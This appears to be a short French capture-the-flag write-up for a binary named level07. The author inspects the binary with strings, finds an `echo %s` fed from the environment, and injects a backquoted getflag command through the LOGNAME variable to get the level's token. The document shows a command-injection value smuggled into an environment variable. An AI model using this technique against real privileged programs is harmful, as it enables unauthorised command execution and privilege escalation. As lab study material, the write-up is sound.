25 lines
772 B
Plaintext
25 lines
772 B
Plaintext
Il y a un binaire level07, on execute strings dessus.
|
|
|
|
Plusieurs chose interessantes, il y a un `echo %s`, si on arrive a faire en sorte que %s soit `getflag` alors on reussira le niveau.
|
|
|
|
Il y a aussi getenv, on peut donc deduire que l'env est utile au programme.
|
|
|
|
On execute le programme, il affiche level07. Au debut nous avons cru qu'il affichait le nom du binaire mais en le telechargeant sur mon PC,
|
|
il affichait gbrochar, on en deduit donc qu'il print le username via l'env
|
|
|
|
USER=`getflag` ./level07
|
|
ne change rien, il reste logname
|
|
|
|
LOGNAME=`getflag` ./level07
|
|
|
|
Check flag.Here is your token :
|
|
sh: 2: Syntax error: ")" unexpected
|
|
|
|
on rajoute des backslashs
|
|
|
|
$ LOGNAME=\`getflag\` ./level07
|
|
|
|
> Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
|
|
|
|
Cela marche
|